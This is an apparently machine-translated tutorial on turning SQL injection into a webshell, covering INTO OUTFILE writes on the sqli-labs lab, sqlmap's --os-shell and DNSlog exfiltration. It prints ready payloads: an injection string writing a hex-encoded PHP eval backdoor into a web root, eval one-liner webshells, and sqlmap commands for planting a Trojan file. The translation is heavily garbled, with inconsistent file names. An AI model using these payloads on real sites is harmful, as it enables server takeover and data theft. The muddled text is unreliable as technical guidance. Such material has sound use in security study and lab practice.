[network security] webshell empowerment of new thinking of SQL injection

Preface

a large number of hr Interviewers like to start from SQL Injection starts asking , So I paid attention to SQL Frequency of injected problems . The result was very surprising ！ What's not surprising is –os-shell At the top of the list .

Like this one ：SQL Inject getshell The way ？

answer ：getshell It means that an attacker uses SQL Inject methods for obtaining system permissions ,Webshell There are two kinds of right raising ： One is to make use of outfile function , The other is to use **–os-shell**;UDF Lifting of rights is realized through stack injection ;MOF The right is passed " Conditional competition " Realization

tip ： Yes sql Injection test ––is–dba, If there is an absolute path ––os–shell, I can't sweep the backstage , Try logging in with the administrator account password

Webshell Raise the right

One 、 into outfile

into outfile Utilized precondition ：

web Directory has write permission , Ability to use single quotation marks
Know the absolute path of the website （ root directory , Or the directory below the root directory ）
secure_file_priv No specific value （ stay mysql/my.ini View in ）

secure_file_priv：secure_file_priv It's to limit load 、dumpfile、into outfile、load_file() Function has the permission to upload and read files in which directory .

About secure_file_priv Configuration of ：

secure_file_priv The value of is null , Said restrictions mysqld Not allowed to import | export
When secure_file_priv The value of is /tmp/ , Said restrictions mysqld Import of | Exports can only occur in /tmp/ Under the table of contents
When secure_file_priv Where there is no specific value , Said is wrong mysqld Import of | Export to limit

So if we want to use into outfile Function to write a sentence, you need to put secure_file_priv The value of is set to no value , How to set it ？

answer ：（1） see secure-file-priv The value of the parameter ：show global variables like ‘%secure%’; if secure_file_priv The default value of is NULL, It means to limit mysqld Not allowed to import | export

（2） modify secure_file_priv Value ： We can do it in mysql/my.ini Check to see if there is secure_file_priv Parameters of , If not, we will add secure_file_priv = ’ ’ that will do ; Check again at this time secure_file_priv The following values of have become empty , After setting, we can use this function to write a sentence

write in webshell（ With sqli-labs Take the seventh pass as an example ）

【 Help safe learning , All resources are obtained from one by one 】
① Network Security Learning Route
②20 Penetration test ebook
③ Safe attack and defense 357 Page notes
④50 A security attack and defense interview guide
⑤ Safety red team penetration Kit
⑥ information gathering 80 Search syntax
⑦100 Three actual cases of vulnerability
⑧ Internal video resources of the safety factory
⑨ Calendar year CTF Analysis of the flag race

1. Injection point judgment
   

Because we found that the input was correct / Incorrect grammar shows that the grammar is correct / error , That is, there are only two states on the page , It is judged as blind injection . When we enter the following code , So we can enter the following code , Get information through echo ！

?id=1’)) – -
Let's keep testing
?id=3’)) and sleep(5) --+

We found that the success delay , So the injection point is 1’)), The characters we enter are enclosed in single quotation marks , And there are two double quotation marks outside the single quotation marks ; Finally, it shows that " you are here … Use outfile…" This tip ; We found him if he used SQL Inject " In a word, Trojans " achieve getshll Purpose

2. Judging the number of columns

Add ： We use order by Number of statement judgment columns ,order by 3 when , Normal display ,4 It's not normal , Judgment for 3 Column

3. write in webshell

• Before adding this, we have obtained the root directory of the website through some methods , You can write a sentence ：<?php eval($_REQUEST[123]);?> ; Recommended Hexadecimal transcoding （ No coding is required ） Add... At the beginning after coding 0X; Finally, we write a sentence to the root directory after the Trojan horse is encoded in hexadecimal outfile.php In file

*   `?id=-3')) union select 1,0x3c3f706870206576616c28245f524551554553545b315d293b3f3e,3 into outfile 'C:\xxxxxx\phpStudy\WWW\outfile.php' --+`

Add ： The directory of the website here should use double slash, otherwise it will not be written in , The first slash means escape , String parsing is not limited to C compiler ,Java compiler 、 Resolution of some configuration files 、Web Servers and so on , You will encounter the problem of parsing strings , Because of the traditional Windows The path separation form of a single slash is used , As a result, unnecessary errors may occur when parsing the file path , So there is the use of double backslashes "“ The form of separating paths ; Whether or not the parsing engine parses backslashes into escape characters , What you end up getting in memory is ”" In the form of , The result will be no problem

4. Connect webshell

Add ： If we were to secure_file_priv The value of is set to null, During the above write operation, we found that the reason why it was not written is as follows ： So there are two situations that are not included ：1. The path of the website is wrong , Or escape without double slash ;2.secure_file_priv The value of is not empty

Two 、-os-shell principle

–os-shell The general principle is to insert the script into the database （ It can also be a log ） in , Then generate the corresponding code file , obtain shell You can execute the command ;–os-shell Is the use of udf To claim rights WebShell. through into oufile Write two files to the server , One can directly execute system commands , One to upload files

Use conditions

Requirements for DBA Database administrator privileges （–is-dba：phpstudy The building is generally DBA）
php The function of active escape is off （PHP Of GPC close ）, Can use single and double quotation marks （ Single quote path required , Out of commission 0x code ）
Know the absolute path of the website ; File cannot be overwritten , So the file must be nonexistent

–secure-file-priv No value （ This function is whether to execute -0s-shell The key to ）：–secure-file-priv yes mysql5.7+ New parameters for , Used to limit the LOAD DATA, SELECT …OUTFILE, LOAD_FILE() To which specified directory

• secure_file_priv by NULL when , Description restrictions mysqld Import or export... Is not allowed
• secure_file_priv by /tmp when , Description restrictions mysqld Only in /tmp Perform import and export in the directory , Other directories cannot execute
• secure_file_priv When it's not worth it , There is no limit to mysqld Import and export in any directory

Add ：secure_file_priv Parameters are read-only , Out of commission set global Command to change , Need to be in my.cnf or my.ini, Join in secure_file_priv='' Restart after Mysql

sqlmap Two files are generated in the specified directory （ File names are random , It's not fixed ）
tmpbeewq.php Used to execute system commands
tmpuqvgw.php To upload files
secure_file_priv No specific value （ stay mysql/my.ini View in ）
magic_quotes_gpc:（PHP magic_quotes_gpc The scope of action is ：WEB Client server ; Action time ： At the beginning of the request ）

Use Sqlmap Implementation steps

1. Weak password login
2. Grab the bag
3. Copy the contents of the packet capture , Save as Alogin.txt（txt file ） To sqlmap Under the table of contents
4. start-up sqlmap：sqlmap -r OAlogin.txt --os-shell
5. Choice language (ASP,ASPX,JSP,PHP)
6. Enter absolute path
7. Write Trojan file

  7.1：pwd // View current path 
  7.2：echo '<?php @eval($_POST['a']); ?>'>> 123.php  // Write the Trojan horse to 123.php
  7.3：cat 123.php // Print 123.php The content of the document 

8. use webshell Connect

route （dns Take out query ） problem

What is the cause of the path problem ？

answer ： For most sql Injected write Shell In terms of way , The absolute path of the website needs to be known , The reason to know here is not because outfile Relative path cannot be written shell, But because you don't know the path ,webshell It cannot be connected and is written by relative path shell Probability is impossible to implement , Or the permission is not enough

dnslog Inject ： namely ,dns Out of band queries belong to Mysql A method of injection , You can query the corresponding dns Parsing records , To get the data we want

Why need its help ？

answer ： In general , When we can't get data directly through joint query , We can only go through blind Injection , Get data step by step , however , Use blind injection , Manual testing takes a lot of time , You might think of using sqlmap Go straight out of the data , But in the actual test , Use sqlmap Running blind injection , There's a good chance , The website ip Seal off , This will affect our test progress .

LOAD_FILE() function ：LOAD_FILE() Function reads a file and returns its contents as a string

The grammar is ：load_file(file_name), among file_name Is the full path to the file

The conditions that this function needs to meet （ As shown below ）：

1. The file must be on the server host

2. You must have the FILE Permission to read the file . Have the right to FILE Users with permissions can read any file on the server host , The document is world-readable Or MySQL Server readable , This property is related to secure_file_priv State correlation

3. The file must be readable by everyone , And its size is less than max_allowed_packet byte